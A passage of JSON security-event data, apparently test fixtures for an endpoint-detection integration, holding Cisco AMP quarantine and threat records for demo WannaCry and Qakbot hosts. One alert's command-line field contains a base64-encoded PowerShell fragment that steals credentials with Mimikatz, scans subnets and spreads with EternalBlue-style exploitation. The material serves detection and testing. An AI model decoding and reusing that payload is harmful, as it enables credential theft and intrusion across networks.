AbgAsACAAYAAkAG0AbwBuACwAIAAnAFYAbwBpAGQAJwAsACAAMAAsACAAJwAnACwAIAAnACcAKQBgACIAIgANAAoAIAAgACAAIAAkAHYAYgBzACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAtAEMAbwBtAE8AYgBqAGUAYwB0ACAAVwBTAGMAcgBpAHAAdAAuAFMAaABlAGwAbAANAAoACQAkAHYAYgBzAC4AcgB1AG4AKAAkAGMAbQBkAG0AbwBuACwAMAApACAAIAANAAoAfQANAAoADQAKACQATgBUAEwATQA9ACQARgBhAGwAcwBlAA0ACgAkAG0AaQBtAGkAIAA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBtAGkAbQBpACcAXQAuAFYAYQBsAHUAZQAgAA0ACgAkAGEALAAgACQATgBUAEwATQA9ACAARwBlAHQALQBjAHIAZQBkAHMAIAAkAG0AaQBtAGkAIAAkAG0AaQBtAGkADQAKACAAIAAgACAAIAAgACAADQAKACQATgBlAHQAdwBvAHIAawBzACAAPQAgAEcAZQB0AC0AVwBtAGkATwBiAGoAZQBjAHQAIABXAGkAbgAzADIAXwBOAGUAdAB3AG8AcgBrAEEAZABhAHAAdABlAHIAQwBvAG4AZgBpAGcAdQByAGEAdABpAG8AbgAgAC0ARQBBACAAUwB0AG8AcAAgAHwAIAA/ACAAewAkAF8ALgBJAFAARQBuAGEAYgBsAGUAZAB9ACAAIAAgACAADQAKACQAaQBwAHMAdQAgAD0AIAAoAFsAVwBtAGkAQwBsAGEAcwBzAF0AIAAnAHIAbwBvAHQAXABkAGUAZgBhAHUAbAB0ADoAYwBvAHIAZQBkAHAAdQBzAHMAdgByACcAKQAuAFAAcgBvAHAAZQByAHQAaQBlAHMAWwAnAGkAcABzAHUAJwBdAC4AVgBhAGwAdQBlACAADQAKACQAaQAxADcAIAA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBpADEANwAnAF0ALgBWAGEAbAB1AGUADQAKACQAcwBjAGIAYQA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBzAGMAJwBdAC4AVgBhAGwAdQBlAA0ACgBbAGIAeQB0AGUAWwBdAF0AJABzAGMAPQBbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABzAGMAYgBhACkAIAAgACAAIAAgAA0ACgBmAG8AcgBlAGEAYwBoACAAKAAkAE4AZQB0AHcAbwByAGsAIABpAG4AIAAkAE4AZQB0AHcAbwByAGsAcwApACAADQAKAHsAIAAgACAAIAAgACAAIAAgACAAIAAgACAADQAKACAAIAAgACAADQAKACAAIAAgACAAJABJAFAAQQBkAGQAcgBlAHMAcwAgACAAPQAgACQATgBlAHQAdwBvAHIAawAuAEkAcABBAGQAZAByAGUAcwBzAFsAMABdACAAIAANAAoACQBpAGYAIAAoACQASQBQAEEAZABkAHIAZQBzAHMAIAAtAG0AYQB0AGMAaAAgACcAXgAxADYAOQAuADIANQA0ACcAKQB7AGMAbwBuAHQAaQBuAHUAZQB9ACAACQANAAoAIAAgACAAIAAkAFMAdQBiAG4AZQB0AE0AYQBzAGsAIAAgAD0AIAAkAE4AZQB0AHcAbwByAGsALgBJAFAAUwB1AGIAbgBlAHQAWwAwAF0AIAAgAA0ACgAgACAAIAAgACQAaQBwAHMAPQBHAGUAdAAtAE4AZQB0AHcAbwByAGsAUgBhAG4AZwBlACAAJABJAFAAQQBkAGQAcgBlAHMAcwAgACQAUwB1AGIAbgBlAHQATQBhAHMAawANAAoACQAkAHQAYwBwAGMAbwBuAG4AIAA9ACAAbgBlAHQAcwB0AGEAdAAgAC0AYQBuAG8AcAAgAHQAYwBwACAADQAKAAkAZgBvAHIAZQBhAGMAaAAgACgAJAB0ACAAaQBuACAAJAB0AGMAcABjAG8AbgBuACkADQAKACAAIAAgACAAewANAAoAIAAgACAAIAAgACAAIAAgACQAbABpAG4AZQAgAD0AJAB0AC4AcwBwAGwAaQB0ACgAJwAgACcAKQB8ACAAPwB7ACQAXwB9AA0ACgAgACAAIAAgACAAIAAgACAAaQBmACAAKAAhACgAJABsAGkAbgBlACAALQBpAHMAIABbAGEAcgByAGEAeQBdACkAKQB7AGMAbwBuAHQAaQBuAHUAZQB9AA0ACgAJAAkAaQBmACAAKAAkAGwAaQBuAGUALgBjAG8AdQBuAHQAIAAtAGwAZQAgADQAKQB7AGMAbwBuAHQAaQBuAHUAZQB9AA0ACgAJAAkAJABpAD0AJABsAGkAbgBlAFsALQAzAF0ALgBzAHAAbABpAHQAKAAnADoAJwApAFsAMABdAA0ACgAgACAAIAAgACAAIAAgACAAaQBmACAAKAAgACgAJABsAGkAbgBlAFsALQAyAF0AIAAtAGUAcQAgACcARQBTAFQAQQBCAEwASQBTAEgARQBEACcAKQAgAC0AYQBuAGQAIAAgACgAJABpACAALQBuAGUAIAAnADEAMgA3AC4AMAAuADAALgAxACcAKQAgAC0AYQBuAGQAIAAoACQAaQBwAHMAIAAtAG4AbwB0AGMAbwBuAHQAYQBpAG4AcwAgACQAaQApACkADQAKACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAkAGkAcABzACsAPQAkAGkADQAKACAAIAAgACAAIAAgACAAIAB9AA0ACgAgACAAIAAgAH0ADQAKACAAIAAgACAAaQBmACAAKAAoAFsARQBuAHYAaQByAG8AbgBtAGUAbgB0AF0AOgA6AFQAaQBjAGsAQwBvAHUAbgB0AC0AJABzAHQAaQBtAGUAKQAvADEAMAAwADAAIAAtAGcAdAAgADUANAAwADAAKQB7AGIAcgBlAGEAawB9AA0ACgAgACAAIAAgAGYAbwByAGUAYQBjAGgAIAAoACQAaQBwACAAaQBuACAAJABpAHAAcwApAA0ACgAgACAAIAAgAHsAIAAgACAADQAKACAAIAAgACAAIAAgACAAIABpAGYAIAAoACgAWwBFAG4AdgBpAHIAbwBuAG0AZQBuAHQAXQA6ADoAVABpAGMAawBDAG8AdQBuAHQALQAkAHMAdABpAG0AZQApAC8AMQAwADAAMAAgAC0AZwB0ACAANQA0ADAAMAApAHsAYgByAGUAYQBrAH0ADQAKACAAIAAgACAAIAAgACAAIABpAGYAIAAoACQAaQBwACAALQBlAHEAIAAkAEkAUABBAGQAZAByAGUAcwBzACkAewBjAG8AbgB0AGkAbgB1AGUAfQAgACAAIAAgACAADQAKACAAIAAgACAAIAAgACAAIABpAGYAIAAoACgAVABlAHMAdAAtAEMAbwBuAG4AZQBjAHQAaQBvAG4AIAAkAGkAcAAgAC0AYwBvAHUAbgB0ACAAMQApACAALQBuAGUAIAAkAG4AdQBsAGwAIAAgAC0AYQBuAGQAIAAkAGkAcABzAHUAIAAtAG4AbwB0AGMAbwBuAHQAYQBpAG4AcwAgACQAaQBwACkAIAANAAoAIAAgACAAIAAgACAAIAAgAHsAIAAgACAADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACQAcgBlAD0AMAANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAaQBmACAAKAAkAGEALgBjAG8AdQBuAHQAIAAtAG4AZQAgADAAKQAgACAAIAAgACAAIAANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAewAkAHIAZQAgAD0AIAB0AGUAcwB0AC0AaQBwACAALQBpAHAAIAAkAGkAcAAgAC0AYwByAGUAZABzACAAJABhACAAIAAtAG4AaQBjACAAJABuAGkAYwAgAC0AbgB0AGwAbQAgACQATgBUAEwATQAgAH0ADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAJAByAGUAIAAtAGUAcQAgADEAKQB7ACQAaQBwAHMAdQAgAD0AJABpAHAAcwB1ACAAKwAiACAAIgArACQAaQBwAH0ADQAKAAkACQAJAGUAbABzAGUADQAKAAkACQAJAHsADQAKAAkACQAJAAkAJAB2AHUAbAA9AFsAUABpAG4AZwBDAGEAcwB0AGwAZQAuAFMAYwBhAG4AbgBlAHIAcwAuAG0AMQA3AHMAYwBdADoAOgBTAGMAYQBuACgAJABpAHAAKQAJAAkACQAJAA0ACgAJAAkACQAJAGkAZgAgACgAJAB2AHUAbAAgAC0AYQBuAGQAIAAkAGkAMQA3ACAALQBuAG8AdABjAG8AbgB0AGEAaQBuAHMAIAAkAGkAcAApAA0ACgANAAoACQAJAAkACQB7AA0ACgAJAAkACQAJAAkAJAByAGUAcwA9AGUAYgA3ACAAJABpAHAAIAAkAHMAYwANAAoACQAJAAkACQAJAGkAZgAgACgAIQAoACQAcgBlAHMAIAAtAGUAcQAgACQAdAByAHUAZQApACkADQAKAAkACQAJAAkACQB7AGUAYgA4ACAAJABpAHAAIAAkAHMAYwB9AA0ACgAJAAkACQAJAAkAJABpADEANwAgAD0AIAAkAGkAMQA3ACAAKwAgACIAIAAiACsAJABpAHAADQAKAAkACQAJAAkAfQANAAoACQAJAAkAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKACAAIAAgACAAfQANAAoAIAB9ACAAIAAgACAAIAAgACAADQAKACQAUwB0AGEAdABpAGMAQwBsAGEAcwBzAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAE0AYQBuAGEAZwBlAG0AZQBuAHQALgBNAGEAbgBhAGcAZQBtAGUAbgB0AEMAbABhAHMAcwAoACcAcgBvAG8AdABcAGQAZQBmAGEAdQBsAHQAOgBjAG8AcgBlAGQAcAB1AHMAcwB2AHIAJwApACAAIAANAAoAJABTAHQAYQB0AGkAYwBDAGwAYQBzAHMALgBTAGUAdABQAHIAbwBwAGUAcgB0AHkAVgBhAGwAdQBlACgAJwBpAHAAcwB1ACcAIAAsACQAaQBwAHMAdQApAA0ACgAkAFMAdABhAHQAaQBjAEMAbABhAHMAcwAuAFAAdQB0ACgAKQANAAoAJABTAHQAYQB0AGkAYwBDAGwAYQBzAHMALgBTAGUAdABQAHIAbwBwAGUAcgB0AHkAVgBhAGwAdQBlACgAJwBpADEANwAnACAALAAkAGkAMQA3ACkADQAKACQAUwB0AGEAdABpAGMAQwBsAGEAcwBzAC4AUAB1AHQAKAApAA==","parent_app":"WmiPrvSE.exe","parent_app_path":"C:\\Windows\\System32\\wbem","parent_pid":2236,"parent_puid":132461352663910600,"parent_user":"SYSTEM","parent_user_sid":"010100000000000512000000","pid":10724,"puid":132465072105597400,"ts":1602033881727175700,"user":"user@testdomain.com","user_sid":"010100000000000512000000"}}],"limited":false,"matched":1},"schema":"endpoint","schema_epoch":2,"sig_id":20190517123456,"sig_rev":5},"detection":"apde:20190517123456","end_ts":1610640884,"engine":"apde","id":"d2616Ab846","name":"WMIPRVSE Launched Encoded Powershell Command","observables":{"file":[{"md5":"a575a7610e5f003cc36df39e07c4ba7d","name":"powershell.exe","path":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0","properties":{"copyright":"© Microsoft Corporation. All rights reserved.","file_version":"10.0.14409.1005","product":"Microsoft® Windows® Operating System","product_version":"10.0.14409.1005"},"sha1":"88e7cdc0b75364418e11b2c53f772085f1b61d1e","sha256":"006cef6ef6488721895d93e4cef7fa0709c2692d74bde1e22e2a8719b2a86218","size":443392,"type_id":1},{"md5":"d683c112190f4b4c6d477d693ee88e35","name":"WmiPrvSE.exe","path":"C:\\Windows\\System32\\wbem","properties":{"copyright":"© Microsoft Corporation. All rights reserved.","file_version":"10.0.14409.1005","product":"Microsoft® Windows® Operating System","product_version":"10.0.14409.1005"},"sha1":"67858ead93feed62c0b1865369840e6e8086f53b","sha256":"385892542cc5a996488262b193061feac4615d66657157c3d4a76251911da334","size":425984,"type_id":1}]},"remediated":false,"severity":"medium","silent":false,"start_ts":1610640884,"tactics":["TA0002","TA0005","TA0008"],"type":"activity","normalized":{"observables":{"file":{"name":["powershell.exe","wmiprvse.exe"],"path":["c:\\windows\\system32\\windowspowershell\\v1.0","c:\\windows\\system32\\wbem"]}},"name":"wmiprvse launched encoded powershell command"},"ts":1610640884},"tactics":["TA0002","TA0005","TA0008"]}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419247189909832000,"timestamp":1610639423,"timestamp_nanoseconds":717000000,"date":"2021-01-14T15:50:23+00:00","event_type":"Retrospective Quarantine Attempt Failed","event_type_id":2164260893,"detection_id":"6419204897366867969","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419247189909832000,"timestamp":1610639423,"timestamp_nanoseconds":686000000,"date":"2021-01-14T15:50:23+00:00","event_type":"Retrospective Quarantine Attempt Failed","event_type_id":2164260893,"detection_id":"6419179204872503298","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419247189909832000,"timestamp":1610639423,"timestamp_nanoseconds":686000000,"date":"2021-01-14T15:50:23+00:00","event_type":"Retrospective Quarantine Attempt Failed","event_type_id":2164260893,"detection_id":"6419229327140847665","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419247189909832000,"timestamp":1610639423,"timestamp_nanoseconds":639000000,"date":"2021-01-14T15:50:23+00:00","event_type":"Retrospective Quarantine Attempt Failed","event_type_id":2164260893,"detection_id":"6419204897366867977","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419247189909832000,"timestamp":1610639423,"timestamp_nanoseconds":888000000,"date":"2021-01-14T15:50:23+00:00","event_type":"Retrospective Detection","event_type_id":553648147,"detection":"W32.Variant:Gen.20gl.1201","detection_id":"6419247189909831755","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\Windows\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419247189909832000,"timestamp":1610639423,"timestamp_nanoseconds":888000000,"date":"2021-01-14T15:50:23+00:00","event_type":"Retrospective Detection","event_type_id":553648147,"detection":"W32.Variant:Gen.20gl.1201","detection_id":"6419247189909831754","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419247189909832000,"timestamp":1610639423,"timestamp_nanoseconds":873000000,"date":"2021-01-14T15:50:23+00:00","event_type":"Retrospective Detection","event_type_id":553648147,"detection":"W32.Variant:Gen.20gl.1201","detection_id":"6419247189909831753","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"qeriuwjhrf","file_path":"\\\\?\\C:\\Windows\\qeriuwjhrf","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419247189909832000,"timestamp":1610639423,"timestamp_nanoseconds":732000000,"date":"2021-01-14T15:50:23+00:00","event_type":"Retrospective Detection","event_type_id":553648147,"detection":"W32.Variant:Gen.20gl.1201","detection_id":"6419229327140847658","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\Windows\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419247189909832000,"timestamp":1610639423,"timestamp_nanoseconds":717000000,"date":"2021-01-14T15:50:23+00:00","event_type":"Retrospective Detection","event_type_id":553648147,"detection":"W32.Variant:Gen.20gl.1201","detection_id":"6419204897366867969","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\Windows\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419247189909832000,"timestamp":1610639423,"timestamp_nanoseconds":686000000,"date":"2021-01-14T15:50:23+00:00","event_type":"Retrospective Detection","event_type_id":553648147,"detection":"W32.Variant:Gen.20gl.1201","detection_id":"6419179204872503298","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\Windows\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419247189909832000,"timestamp":1610639423,"timestamp_nanoseconds":639000000,"date":"2021-01-14T15:50:23+00:00","event_type":"Retrospective Detection","event_type_id":553648147,"detection":"W32.Variant:Gen.20gl.1201","detection_id":"6419204897366867977","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412604589194871000,"timestamp":1610637865,"timestamp_nanoseconds":994000000,"date":"2021-01-14T15:24:25+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6412604589194870787","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412604589194871000,"timestamp":1610637865,"timestamp_nanoseconds":573000000,"date":"2021-01-14T15:24:25+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6412604589194870787","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"QuotaGroup.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\QuotaGroup\\QuotaGroup.exe","identity":{"sha256":"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446","sha1":"f5a171c879b90e77861daf19741b373646d791ff","md5":"32c9e6737dbdcbfb7563a3f27e2b1571"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412604589194871000,"timestamp":1610637865,"timestamp_nanoseconds":479000000,"date":"2021-01-14T15:24:25+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6412604589194870786","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"","file_path":"","identity":{"sha256":"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412604589194871000,"timestamp":1610637865,"timestamp_nanoseconds":479000000,"date":"2021-01-14T15:24:25+00:00","event_type":"Threat 